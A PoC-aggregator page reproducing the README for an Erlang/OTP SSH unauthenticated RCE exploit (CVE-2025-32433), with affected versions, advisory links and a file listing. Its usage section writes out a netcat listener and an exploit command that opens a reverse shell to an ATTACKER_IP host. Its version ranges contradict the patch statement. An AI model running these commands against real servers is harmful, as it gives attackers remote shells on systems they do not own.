关联漏洞
            
        
            描述
            PoC showing unauthenticated remote code execution in Erlang/OTP SSH server. By exploiting a flaw in SSH protocol message handling, an attacker can execute arbitrary commands on the target without valid credentials.
        
        
            介绍
            # CVE-2025-32433 - Erlang/OTP SSH RCE PoC

## Overview
PoC showing **unauthenticated remote code execution** in Erlang/OTP SSH server.  
By exploiting a flaw in SSH protocol message handling, an attacker can execute arbitrary commands on the target without valid credentials.
- **CVE:** CVE-2025-32433
- **CVSS Score:** 10.0 (Critical)
- **Affected Versions:**
  - OTP-27.3.3 and earlier
  - OTP-26.2.5.11 and earlier
  - OTP-25.3.2.20 and earlier
This issue is patched in OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20.
## References
- [Unit42 Advisory](https://unit42.paloaltonetworks.com/erlang-otp-cve-2025-32433/)
- [PoC Repository](https://github.com/omer-efe-curkus/CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-32433)
## Usage
**Listener Setup:**
```bash
nc -lvnp 1234
```

**Run Exploit:**
```bash
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
```
- `--rhost` : Target IP
- `--rport` : Target SSH port
- `--lhost` : Your IP for reverse shell
- `--lport` : Your listener port


## Disclaimer
This repository is for **educational purposes only**. Do not use this exploit against systems you do not own or have explicit permission to test. Misuse may be illegal and is strictly prohibited.
        
        文件快照
        
            
                
 [4.0K]  /data/pocs/31df9e6010068249393ad5bf7d7205d0705b5035
├── [2.4K]  CVE-2025-32433-dbs.py
├── [4.0K]  images
│   ├── [ 24K]  image copy 2.png
│   ├── [ 35K]  image copy.png
│   └── [ 10K]  image.png
└── [1.5K]  README.md
1 directory, 5 files
                
             
         
        备注
        
            
                1. 建议优先通过来源进行访问。
                2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
                3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。